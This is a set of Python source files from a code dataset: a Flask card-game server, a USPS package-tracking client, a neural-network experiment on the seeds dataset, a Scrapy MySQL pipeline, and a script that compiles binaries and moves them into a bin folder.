act_split[1]:\n game_data['deck'].append(card)\n else:\n hand.append(card)\n player['cards'] = hand\n if act_split[0] == 'claim':\n # idx = 
random.randint(0,len(state['deck']))\n # card = state['deck'].pop(idx)\n if len(game_data['deck']) > 0:\n random.shuffle(game_data['deck'])\n card = game_data['deck'].pop()\n card['hidden'] = True\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n player['cards'].append(card)\n if act_split[0] == 'reset':\n #with open(db_prefix+'state_base.json', \"r\") as statef:\n # state = json.load(statef)\n #for item in range(int(act_split[1])):\n # game_data['players'].append(dict(user_name = \"player\" + str(item+1), n_coins = 2, cards = []))\n room[\"game_data\"] = room[\"game_init\"]\n room[\"game_init\"] = copy.deepcopy(room[\"game_init\"])\n if act_split[0] == 'takeincome':\n is_ajax = True\n game_data = room[\"game_data\"]\n for player in game_data.get(\"players\", []):\n if player.get('user_name', '') == user_name:\n player['n_coins'] += 1\n game_data['turn'] += 1\n if game_data['turn'] >= len(game_data[\"players\"]):\n game_data['turn'] = 0\n if act_split[0] == 'takeforeignaid':\n is_ajax = True\n game_data = room[\"game_data\"]\n for player in game_data.get(\"players\", []):\n if player.get('user_name', '') == user_name:\n game_data['turn'] += 1\n if game_data['turn'] >= len(game_data[\"players\"]):\n game_data['turn'] = 0\n game_data['block_state'] = dict()\n game_data['block_state'] = copy.deepcopy(game_data)\n player['n_coins'] += 2\n if act_split[0] == 'block':\n is_ajax = True\n if request.values['desired_block'] == game_data[\"activity_log\"][-1]:\n activity_log = copy.deepcopy(game_data[\"activity_log\"])\n bs = copy.deepcopy(game_data)\n game_data = copy.deepcopy(game_data['block_state'])\n game_data[\"activity_log\"] = activity_log\n game_data[\"block_state\"] = bs\n def is_duke(player_name):\n for item in game_data[\"players\"]:\n if item[\"user_name\"] == player_name:\n for card in item[\"cards\"]:\n if card[\"name\"] == \"Duke\":\n return True\n return False\n if (\"foreignaid\" in game_data[\"activity_log\"][0] and is_duke(user_name)):\n game_data[\"claim_legit\"] = True\n game_data[\"claim_maker\"] = user_name\n else:\n game_data[\"claim_legit\"] = False\n game_data[\"claim_maker\"] = user_name\n room[\"game_data\"] = game_data\n if act_split[0] == 'challenge':\n is_ajax = True\n if request.values['desired_challenge'] == game_data[\"activity_log\"][-1]:\n if game_data[\"claim_legit\"] == False:\n claim_maker = game_data[\"claim_maker\"]\n activity_log = copy.deepcopy(game_data[\"activity_log\"])\n game_data = copy.deepcopy(game_data['block_state'])\n game_data[\"activity_log\"] = activity_log\n game_data[\"penalize\"] = claim_maker\n room[\"game_data\"] = game_data\n else:\n game_data[\"penalize\"] = user_name\n if act_split[0] == \"discard\":\n is_ajax = True\n for player in game_data.get('players', []):\n if player['user_name'] == user_name:\n hand = []\n for i, card in enumerate(player.get('cards', [])):\n if str(i) == act_split[1]:\n game_data['graveyard'].append(card)\n else:\n hand.append(card)\n player['cards'] = hand\n game_data[\"penalize\"] = ''\n\n\n\n\n game_data['activity_log'].append(f\"{user_name} did {action_string}\")\n with open(db_prefix+'state.json', \"w\") as statef:\n json.dump(state, statef)\n if is_ajax:\n # TODO sanitize state so we aren't sending private hand info and deck info out to all players\n return jsonify(dict(game_data=game_data))\n else:\n return redirect(url_for('play_page', user_name=user_name, room_name=room_name))\n\n@app.route('/play_page/<user_name>/<room_name>')\ndef play_page(user_name, room_name):\n n_coins = 0\n players 
= []\n with open(db_prefix+'state.json') as statef:\n state = json.load(statef)\n game_data = state.get('rooms', dict()).get(room_name, dict()).get('game_data', dict())\n players = game_data.get('players', [])\n graveyard = game_data.get('graveyard', [])\n deck = game_data.get('deck', [])\n deck_size = len(deck)\n activity_log = game_data.get('activity_log', [])\n return render_template(\"play_page.html\", players=players, graveyard=graveyard, deck_size = deck_size, user_name=user_name, activity_log=activity_log, room_name=room_name)\n\n@app.route('/play_page2/<user_name>/<room_name>')\ndef play_page2(user_name, room_name):\n n_coins = 0\n players = []\n with open(db_prefix+'state.json') as statef:\n state = json.load(statef)\n game_data = state.get('rooms', dict()).get(room_name, dict()).get('game_data', dict())\n turn = game_data.get('turn')\n players = game_data.get('players', [])\n whose_turn = ''\n for i, item in enumerate(players):\n if i == turn:\n whose_turn = item.get('user_name', '')\n graveyard = game_data.get('graveyard', [])\n deck = game_data.get('deck', [])\n deck_size = len(deck)\n penalize = game_data.get('penalize', '')\n activity_log = game_data.get('activity_log', [])\n return render_template(\"play_page2.html\", players=players, graveyard=graveyard, deck_size = deck_size, user_name=user_name, activity_log=activity_log, room_name=room_name, turn=turn, whose_turn=whose_turn, penalize=penalize)\n\n@app.route('/join_page')\ndef join_page():\n with open(db_prefix+'state.json', \"r\") as statef:\n state = json.load(statef)\n public_rooms = []\n rooms = state.get('rooms', [])\n for item in rooms:\n print(rooms[item].get('is_private'))\n if len(rooms[item].get('is_private', \"on\")) == 0:\n public_rooms.append(item)\n return render_template(\"join_page.html\", public_rooms=public_rooms)\n@app.route('/create_page')\ndef create_page():\n game_names = [\"Spanish Flu\"]\n return render_template(\"create_page.html\", game_names=game_names)\n@app.route('/create', methods=[\"GET\", \"POST\"])\ndef create():\n user_name = escape(request.form.get('user_name', ''))\n user_name = user_name.replace(' ', '')\n if len(user_name) == 0:\n # TODO improve - prevent collisions with db checking\n user_name = 'player'+str(uuid.uuid4().hex)[0:8]\n room_name = escape(request.form.get('room_name', ''))\n room_name = room_name.replace(' ', '')\n if len(room_name) == 0:\n # TODO improve - prevent collisions with db checking\n room_name = 'room'+str(uuid.uuid4().hex)[0:8]\n is_private = escape(request.form.get('is_private', ''))\n game_name = escape(request.form.get('game_name', ''))\n #if game_name == \"Spanish Flu\":\n # with open(db_prefix+'state_base.json', \"r\") as statef:\n # game_data = json.load(statef)\n # game_init = copy.deepcopy(game_data)\n # players=game_data.get('players', [])\n # players.append(dict(user_name = user_name, n_coins = 2, cards = []))\n # game_data['players'] = players\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n #else:\n # game_data = dict()\n #if \"turn\" not in game_data:\n # game_data[\"turn\"] = 0\n #room = dict(room_name = 
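# --- Sketch of the name-fallback idiom /create and /join use above: sanitize,
# --- strip spaces, and mint a short random handle when the field came in empty.
# --- markupsafe.escape stands in here for the escape helper the app imports.
import uuid
from markupsafe import escape

def normalize_name(raw, prefix):
    name = str(escape(raw or '')).replace(' ', '')
    if len(name) == 0:
        name = prefix + str(uuid.uuid4().hex)[0:8]   # e.g. "player3f9c2a1d"
    return name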
room_name,\n # game_master = user_name,\n # is_private = is_private,\n # game_name = game_name,\n # game_data = game_data,\n # game_init = game_init)\n #with open(db_prefix+'state.json', \"r\") as statef:\n # state = json.load(statef)\n #rooms = state.get('rooms', dict())\n #rooms[room_name] = room # Note duplicate rooms get clobbered fix that TODO\n #state['rooms'] = rooms\n #with open(db_prefix+'state.json', \"w\") as statef:\n # json.dump(state, statef)\n rooms = mydb[\"room\"]\n rc = RC(rooms)\n room = rc.create_room(room_name, user_name, is_private, game_name)\n rc.modify_room(room_name, 'waiting')\n rc.modify_room(room_name, 'started')\n print(room)\n return redirect(url_for('mongo_play_page', user_name=user_name, room_name=room_name))\n@app.route('/join', methods=[\"GET\", \"POST\"])\ndef join():\n user_name = str(escape(request.values['user_name']))\n user_name = user_name.replace(' ', '')\n if len(user_name) == 0:\n # TODO improve - prevent collisions with db checking\n user_name = 'player'+str(uuid.uuid4().hex)[0:8]\n if 'private_join' in request.values:\n room_name = str(escape(request.values['private_room_name']))\n elif 'public_join' in request.values:\n room_name = str(escape(request.values['public_room_name']))\n else:\n room_name = str(escape(request.values['room_name']))\n\n rooms = mydb[\"room\"]\n rc = RC(rooms)\n room = rc.join_room(room_name, user_name)\n print(room)\n\n #with open(db_prefix+'state.json', \"r\") as statef:\n # state = json.load(statef)\n #room = state.get('rooms', dict(room_name=None)).get(room_name, None)\n if room == False:\n return \"Room Not Found\" # TODO\n #game_data = room.get(\"game_data\", dict())\n #players = game_data.get('players', [])\n #def user_exists():\n # for item in game_data.get('players', []):\n # if item['user_name'] == user_name:\n # return True\n # return False\n\n #print('join')\n #if not user_exists():\n # print('join')\n # players.append(dict(user_name = user_name, n_coins = 2, cards = []))\n # game_data['players'] = players\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n # if len(game_data['deck']) > 0:\n # random.shuffle(game_data['deck'])\n # card = game_data['deck'].pop()\n # card['hidden'] = True\n # for player in game_data.get('players', []):\n # if player['user_name'] == user_name:\n # player['cards'].append(card)\n #if \"turn\" not in game_data:\n # game_data[\"turn\"] = 0\n #with open(db_prefix+'state.json', \"w\") as statef:\n # print('c')\n # json.dump(state, statef)\n return redirect(url_for('mongo_play_page', user_name=user_name, room_name=room_name))\n\ndef main():\n global db_prefix\n db_prefix = ''\n # app.run(host='0.0.0.0', debug=True)\n socketio.run(app)\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":45588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"419514982","text":"#!/usr/bin/env python3\n# USPS API Tracking\n# Tested on Python 3.4.2 running on Debian 8.7\n# https://github.com/LiterallyLarry/USPS-Tracking-Python\n#\n# You must provide your API key in config.json as 'api_key' before running this program! 
 You can sign up for an API key here: https://www.usps.com/business/web-tools-apis/welcome.htm\n\nfrom urllib import request, parse\nfrom sys import argv\nfrom xml.etree import ElementTree\nimport argparse, json, sys, os\n\nUSPS_API_URL = \"http://production.shippingapis.com/ShippingAPI.dll?API=TrackV2\";\n\npath = os.path.dirname(os.path.realpath(__file__))\n\nwith open(os.path.join(path, \"config.json\")) as config_file:\n config = json.load(config_file);\n api_key = config.get(\"api_key\");\n\nif not api_key:\n sys.exit(\"Error: Could not find USPS API key in config.json!\");\n\nparser = argparse.ArgumentParser(description='Tracks USPS numbers via Python.');\n\nparser.add_argument('tracking_numbers', metavar='TRACKING_NUMBER', type=str, nargs='*',\n help='a tracking number');\nparser.add_argument('-s', action='store_true', default=False,\n dest='show_tracking_number',\n help='Show tracking number in output');\nparser.add_argument('-n', action='store_false', default=True,\n dest='show_tracking_extended',\n help='Hide extended tracking information');\nparser.add_argument('-m', action='store_true', default=False,\n dest='show_minimal',\n help='Suppress UI');\n\ndef usps_track(numbers_list):\n xml = '<TrackRequest USERID=\"%s\">' % api_key;\n for track_id in numbers_list:\n xml += '<TrackID ID=\"%s\"></TrackID>' % track_id;\n xml += '</TrackRequest>';\n target = \"%s&%s\" % (USPS_API_URL, parse.urlencode({ \"XML\" : xml }));\n request_obj = request.urlopen(target);\n result = request_obj.read();\n request_obj.close();\n return result;\n\nif __name__ == \"__main__\":\n args = parser.parse_args();\n if args.tracking_numbers: # Arguments support multiple tracking numbers\n track_ids = args.tracking_numbers;\n #track_ids = argv[1:];\n else:\n #track_id = input(); # User input supports only a single number\n track_id = input('Enter tracking numbers separated by spaces: '); # User input supports multiple tracking numbers split with spaces\n if len(track_id) < 1:\n exit(0);\n track_ids = track_id.split(' ');\n #track_ids = [ track_id ];\n real = []\n for id in track_ids:\n if id[0] != '#':\n real.append(id);\n track_ids = real\n track_xml = usps_track(track_ids);\n# print(track_xml);\n track_result = ElementTree.ElementTree(ElementTree.fromstring(track_xml));\n if not args.show_minimal:\n print('OK!');\n for result in track_result.findall('Description'):\n print(result.text);\n# for result in track_result.findall('.//TrackSummary'):\n# print(result.text);\n for number, result in enumerate(track_result.findall('.//TrackInfo')):\n if args.show_tracking_number:\n track_num = ' (%s)' % track_ids[number];\n else:\n track_num = ''\n summary = result.find('TrackSummary');\n if summary is None:\n print('Error in XML!');\n print(track_xml);\n else:\n if args.show_minimal:\n print('%s' % summary.text);\n else:\n print('\\nPackage #%d%s:\\n %s' % (number+1,track_num,summary.text));\n if args.show_tracking_extended:\n details = result.findall('TrackDetail');\n for number_2, detailed_result in enumerate(details):\n if number_2+1 == len(details):\n print(' └ %s' % detailed_result.text);\n else:\n print(' ├ %s' % detailed_result.text);\n","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"254436721","text":"import pandas as pd\nimport numpy as np\nimport os\nfrom MLP import MLP\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_score\nimport matplotlib.pyplot as plt\nimport itertools\nfrom datetime 
import datetime\n\n\nif __name__ == '__main__':\n # Read csv file\n data = pd.read_csv(os.path.join('..', 'seeds.txt'))\n\n outpath = os.path.join('plots', 'seeds')\n\n orig_columns = data.columns\n\n # Normalize Columns and add polynomial features\n for col in orig_columns[:-1]:\n data[col] = (data[col] - data[col].min()) / (data[col].max()-data[col].min())\n data = data.join(data[col].pow(2), rsuffix='2')\n data = data.join(data[col].pow(3), rsuffix='3')\n\n # Shuffle and sampling dataset keeping class proportion\n train_df = pd.DataFrame(columns=data.columns)\n test_df = pd.DataFrame(columns=data.columns)\n validation_df = pd.DataFrame(columns=data.columns)\n\n grouped = data.groupby('class')\n\n np.random.seed(28021992)\n\n for name, group in grouped:\n idx_list = list(group.index)\n np.random.shuffle(idx_list)\n group = group.loc[idx_list]\n\n train_size = int(np.round(len(group) * 0.6))\n test_size = int(np.round(len(group) * 0.2))\n\n train_df = train_df.append(group[:train_size])\n test_df = test_df.append(group[train_size:train_size+test_size])\n validation_df = validation_df.append(group[train_size+test_size:])\n\n y_train = train_df[['class']].copy()\n y_test = test_df[['class']].copy()\n y_validation = validation_df[['class']].copy()\n\n # Convert pandas.DataFrame into numpy.matrix\n x_train = np.asmatrix(train_df.drop('class', axis=1).values)\n x_test = np.asmatrix(test_df.drop('class', axis=1).values)\n x_validation = np.asmatrix(validation_df.drop('class', axis=1).values)\n\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n\n n_list = [0.3, 0.1, 0.03, 0.01, 0.003]\n\n best_mlp = None\n best_precision = 0.0\n best_n = None\n best_topology = None\n\n for i in range(1, 4):\n for hidden in itertools.product([i for i in range(3, 7)], repeat=i):\n hidden = list(hidden)\n best_topology_mlp = None\n best_topology_precision = 0.0\n best_topology_n = None\n\n for n in n_list:\n print('[' + datetime.now().__str__() + '] training MLP {} witn n={}'.format(hidden, n))\n\n for it in range(5):\n print('[' + datetime.now().__str__() + '] iteration {}'.format(it))\n # Train perceptron\n mlp = MLP(x_train, y_train['class'], hidden=hidden, n=n)\n\n # Classify dataset using the trained perceptron\n p_y = mlp.predict(x_test)\n\n actual_precision = precision_score(\n y_test.values.astype(int),\n p_y.values.astype(int),\n average='micro'\n )\n\n if actual_precision > best_topology_precision:\n best_topology_precision = actual_precision\n best_topology_mlp = mlp\n best_topology_n = n\n\n if best_topology_precision > best_precision:\n best_precision = best_topology_precision\n best_n = best_topology_n\n best_mlp = best_topology_mlp\n best_topology = hidden.copy()\n\n # Print confusion matrix\n p_y = best_topology_mlp.predict(x_test)\n conf_m = confusion_matrix(y_test.values.astype(int), p_y.values.astype(int))\n print('##### Seeds Experiment - Layers {}\\n'.format(hidden))\n # print('Weights:')\n # print(best_topology_mlp.w)\n # print()\n print('Best n:')\n print(best_topology_n)\n print('Confusion Matrix:')\n print(conf_m)\n print('Precision:')\n print(best_topology_precision)\n\n # Plot Error Graph to check learning rate\n plt.plot([i for i in range(len(best_topology_mlp.erro_var))], best_topology_mlp.erro_var)\n plt.grid(True, linestyle=':')\n plt.savefig(os.path.join(outpath, '{}.png'.format(hidden)))\n plt.close()\n\n # Best MLP validation\n p_y = best_mlp.predict(x_validation)\n conf_m = confusion_matrix(y_validation.values.astype(int), p_y.values.astype(int))\n print('##### Seeds 
Experiment - Best Topology {}\\n'.format(best_topology))\n # print('Weights:')\n # print(best_mlp.w)\n # print()\n print('Best n:')\n print(best_n)\n print('Confusion Matrix:')\n print(conf_m)\n print('Test Precision:')\n print(best_precision)\n actual_precision = precision_score(y_validation.values.astype(int), p_y.values.astype(int), average='micro')\n print('Validation Precision:')\n print(actual_precision)\n","sub_path":"Python_Assignments/mlp/seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"231201750","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport scrapy\nfrom twisted.enterprise import adbapi\nimport MySQLdb\nimport MySQLdb.cursors\nimport logging\nfrom settings import *\n\n\n\nclass QiushiPipeline(object):\n\n def __init__(self):\n try:\n self.dbpool = adbapi.ConnectionPool(\n 'MySQLdb',\n db = MYSQL_DBNAME,\n user = MYSQL_USER,\n passwd = MYSQL_PASSWD,\n cursorclass = MySQLdb.cursors.DictCursor,\n charset = 'utf8',\n use_unicode = True,\n )\n\n except Exception as e:\n logging.exception(e)\n\n\n\n def process_item(self, item, spider):\n content = item['content']\n comment_count = item['comment_count']\n vote_count = item['vote_count']\n url = item['url']\n spider_time = item['spider_time']\n channel = item['channel']\n\n try:\n self.dbpool.runQuery(\"insert into blog_qiushibaike values(NULL,'{}', '{}', '{}', '{}', '{}', '{}')\"\n .format(content[0].encode('utf-8'),\n comment_count[0].encode('utf-8'),\n vote_count[0].encode('utf-8'),\n url.encode('utf-8'),\n spider_time.encode('utf-8'),\n channel.encode('utf-8'),\n ))\n except Exception as e:\n logging.exception(e)\n\n return item\n","sub_path":"spiders/qiushi/qiushi/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"415934002","text":"#!/usr/bin/env python\n\n'''\n\n- This script goes in the PMOD folder\n\nThis script faciliates compiling binaries from source files \nwithin the source folder ('src'), this is accomplished by \nformatting and running a shell script.\nand moving those binaries to the binaries folder ('bin').\n\nA graphical example is shown below: this script is run within 'Main'\n\n |-- 'bin'----|---'run.sh'\n'Main' --| |\n |-- 'src'-| |---'' <----------<------|\n | |\n |--'bin-2' <--------|-->| |\n | | |--| The script moves the binaries 'bin-1' and 'bin-2'\n |--'bin-1' <--------|-->| into the 'bin' folder from the 'src' folder\n | |\n |--'compile.sh' -->--| 'compile.sh' creates 'aux' and 'xeb_server'\n\n\nInfo:\n\n - Change 'linux' to 'windows' for the OS_INST variable if running on windows\n\n\nInputs:\n\n bin_list : [string or array of strings], The strings corrospond to the names of the binary files\n\n src_script : [string] corrosponds to the name of the script which\n generates the binaries named in 'bin_list\n\n bin_script : [string] corrosponds to the name of the script which\n runs the binary files within the binary directory\n\n DIR_NAME : [string] (\"Main\"), corrosponds to the name of the program folder\n\n OS_INST : [string] (\"linux\"), The OS on which the program is ran\n\n SRC_DIR : [string] (\"src\"), The name of the source folder\n\n BIN_DIR : [string] (\"bin\"), The name of 
the binary directory\n\n SPC : [string] (\" \"), Indention spaces for more legable printing\n\n\nOutput:\n\n Boolean: \"True\" if success, else \"False\" if failure.\n\n'''\n\nimport sys\nimport os\nimport subprocess\nimport time\n\nimport pmod.cmdline as cml\nimport pmod.cmdutil as cmu\nimport pmod.ioparse as iop\nimport pmod.strlist as strl\n\n\n\ndef compileFunc(bin_list,\n src_script = \"compile.sh\",\n bin_script = \"run.sh\",\n DIR_NAME = \"Main\",\n OS_INST = \"linux\",\n SRC_DIR = \"src\",\n BIN_DIR = \"bin\",\n SPC=\" \"):\n\n # Setting the stage\n\n # Pathway variables, these should always be strings\n DIRPATH = \"\"\n SRCPATH = \"\"\n BINPATH = \"\"\n\n # Check input variable 'bin_list' for TypeError\n if(isinstance(bin_list,(list,tuple))):\n if(not all([isinstance(entry,str) for entry in bin_list])):\n print(SPC+\"[compileFunc] ExitError: if input 'bin_list' is an array, it must contain only strings\\n\")\n return False\n elif(isinstance(bin_list,str)):\n bin_list = [bin_list]\n else:\n print(SPC+\"[compileFunc] ExitError: input 'bin_list' must be either an array or a string\\n\")\n return False\n\n # Set-up debug variables\n movexeb = False # Delete\n moveaux = False # Delete\n move_dict = {}\n for entry in bin_list:\n move_dict[entry] = False\n exefail = False\n\n #------------------\n # Compile actions |\n #------------------\n\n print(\" \")\n print(\"The 'compileFunc' routine is now starting...runtime messesges will be printed below:\\n\")\n\n # Set internal command line and command line utility\n try:\n cmv = cml.PathParse(OS_INST)\n cmt = cmu.cmdUtil(cmv)\n if(cmt.CML_INIT == False):\n print(SPC+\"Error: 'cmdUtil' could not be initialized\\n\")\n return False\n print(SPC+\"Success: Internal pathway routine has been successfully initialized\")\n except:\n print(SPC+\"Error: an error occured while initializing internal pathway routine\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Set start pathway\n success, value = cmv.cmd(\"pwd\")\n if(not success):\n print(SPC+\"Error: It looks like the '\"+DIR_NAME+\"' folder pathway could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n DIRPATH = value\n\n # Moving into the binary folder (bin)\n success, value = cmv.cmd(\"cd \"+BIN_DIR)\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', could not be accessed\")\n print(SPC+\" Check to see if the binary folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Set binary directory (bin) pathway\n success, value = cmv.cmd(\"pwd\")\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', pathway could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\")\n return False\n else:\n BINPATH = value\n\n # Get list of content of Bin directory\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', content could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n binarylist = value\n\n # Check for pre-existing binary files and remove any if the exist\n for entry in bin_list:\n if(entry in binarylist):\n print(SPC+\"Warning: An already existing '\"+entry+\"' file is present in the binary folder\")\n print(SPC+\" An attempt will be made to overwrite this 
file...\")\n success, value = cmv.cmd(\"rm \"+entry)\n if(not success):\n print(SPC+\"Error: failure to delete existing file, '\"+entry+\"'\")\n print(SPC+\"The newly compiled version of this binary may end up in the '\"+DIR_NAME+\"' folder\\n\")\n\n # Return to 'Main' directory\n success, value = cmv.cmd(\"cd ..\")\n if(not success):\n print(SPC+\"Error: It looks like the program folder, '\"+DIR_NAME+\"', could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Moving into the source folder (src)\n cmv = cml.PathParse(OS_INST)\n success, value = cmv.cmd(\"cd \"+SRC_DIR) \n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', could not be accessed\")\n print(SPC+\" Check to see if the source folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Get source folder (src) pathway\n success, value = cmv.cmd(\"pwd\")\n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', pathway could not be accessed\")\n print(SPC+\" Check to see if the source folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n SRCPATH = value\n\n # Get content of source folder (src)\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed\")\n print(SPC+\" Check to see if the source file properly formatted\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n if(isinstance(value,(list,tuple))):\n if(len(value) > 0):\n check_list = [i.rstrip() for i in value]\n\n # Check for pre-existing binary files in the source folder (src) and remove any that are found\n for entry in bin_list:\n if(entry in check_list):\n print(SPC+\"Warning: An already existing '\"+entry+\"' file is present in the binary folder\")\n print(SPC+\" An attempt will be made to overwrite this file...\")\n success, value = cmv.cmd(\"rm \"+entry)\n if(not success):\n print(SPC+\"Error: failure to delete existing file, '\"+entry+\"'\")\n print(SPC+\"There may be a failure when attempting to overwrite this binary during compilation\\n\")\n else:\n print(\"Error: It looks like the source folder, '\"+SRC_DIR+\"', is empty\") \n print(\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed\")\n print(SPC+\" Check to ensure that the source directory is properly formatted\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n \n # Move system directory to source folder (src)\n try:\n os.chdir(SRCPATH)\n except:\n print(SPC+\"Error: failure to set the shell pathway to the source folder\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False \n\n # Ensure that the compiling shell script has UNIX endline characters\n success = cmt.convert_file_endline(src_script, foldName = SRC_DIR)\n if(success == False):\n print(SPC+\"Warning: '\"+src_script+\"'shell script not formatted, errors may result from improper formatting\\n\")\n\n # Change the mode on the shell script to an exceutable\n try:\n subprocess.call(\"chmod +x \"+src_script,shell=True)\n except:\n print(SPC+\"Error: failure to set the 'compileFunc' shell script to an 
executable\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Run the compiling shell script\n try:\n subprocess.call(\"./\"+src_script,shell=True)\n except:\n print(SPC+\"Error: failure to run the 'compileFunc' shell script\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Get content of source folder (src) after running compiling script\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed after compiling\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # check contents of source folder (src) for binary(ies)\n if(isinstance(value,(list,tuple))):\n if(len(value) > 0):\n for entry in bin_list:\n if(entry in value):\n print(SPC+\"Success: The binary file, '\"+entry+\"', has been found after compiling\")\n move_dict[entry] = True\n else:\n print(SPC+\"Error: it looks like the binary file, '\"+entry+\"' wasn't created upon compilation\")\n else:\n print(\"Error: It looks like the source folder, '\"+SRC_DIR+\"', is empty\")\n print(\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n else:\n print(SPC+\"Error: It looks like the source folder, '\"+SRC_DIR+\"', content could not be accessed after compiling\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Move binaries to the main directory\n for entry in bin_list:\n if(move_dict[entry]):\n success, value = cmv.cmd(\"mv \"+entry+\" ..\")\n if(not success):\n print(SPC+\"Error: '\"+entry+\"' was not successfully moved into the '\"+DIR_NAME+\"' directory\")\n move_dict[entry] = False\n\n # Move pathway back to the main directory\n success, value = cmv.cmd(\"cd ..\")\n if(not success):\n print(SPC+\"Error: It looks like the program folder, '\"+DIR_NAME+\"', could not be reaccessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Move binaries into the binary directory\n for entry in bin_list:\n if(move_dict[entry]):\n success, value = cmv.cmd(\"mv \"+entry+\" \"+BIN_DIR)\n if(not success):\n print(SPC+\"Error: '\"+entry+\"' was not successfully moved into the '\"+BIN_DIR+\"' directory\")\n move_dict[entry] = False\n\n # Move pathway back into the binary directory\n success, value = cmv.cmd(\"cd \"+BIN_DIR)\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', could not be accessed\")\n print(SPC+\" Check to see if the binary folder is present\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Move system directory to binary directory (bin)\n try:\n os.chdir(BINPATH)\n except:\n print(SPC+\"Error: failure to set the shell pathway to the binary folder\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Ensure that the running shell script has UNIX endline characters\n success = cmt.convert_file_endline(bin_script, foldName=BIN_DIR)\n if(success == False):\n print(SPC+\"Warning: \"+bin_script+\" shell script not formatted, errors may result from improper formatting\\n\")\n\n # Change the mode on the shell script to an exceutable\n try:\n subprocess.call(\"chmod +x \"+bin_script,shell=True)\n except:\n print(SPC+\"Error: failure to set the '\"+bin_script+\"' shell script to an executable\")\n 
print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\\n\")\n return False\n\n # Get content of binary folder (bin) after moving binaries\n success, value = cmv.cmd(\"ls\")\n if(not success):\n print(SPC+\"Error: It looks like the binary folder, '\"+BIN_DIR+\"', content could not be accessed\")\n print(SPC+\"ExitError: fatal error; 'compileFunc' could not be completed\")\n return False\n\n # Move binaries into the binary directory\n bin_fail = False\n for entry in bin_list:\n if(entry in value):\n print(SPC+\"Success: The '\"+entry+\"' binary is accounted for in the binary folder\")\n elif(move_dict[entry] == False):\n print(SPC+\"Error: The '\"+entry+\"' binary is not accounted for in the binary folder\")\n bin_fail = True\n else:\n bin_fail = True\n\n if(bin_fail):\n print(SPC+\"Error: compileFunc failed, binary(ies) missing; program will not work as intended\\n\")\n\n return True\n\n\n#----------\n# example |\n#----------\n\n# Main program: test example, change \"False\" to \"True\" to actually 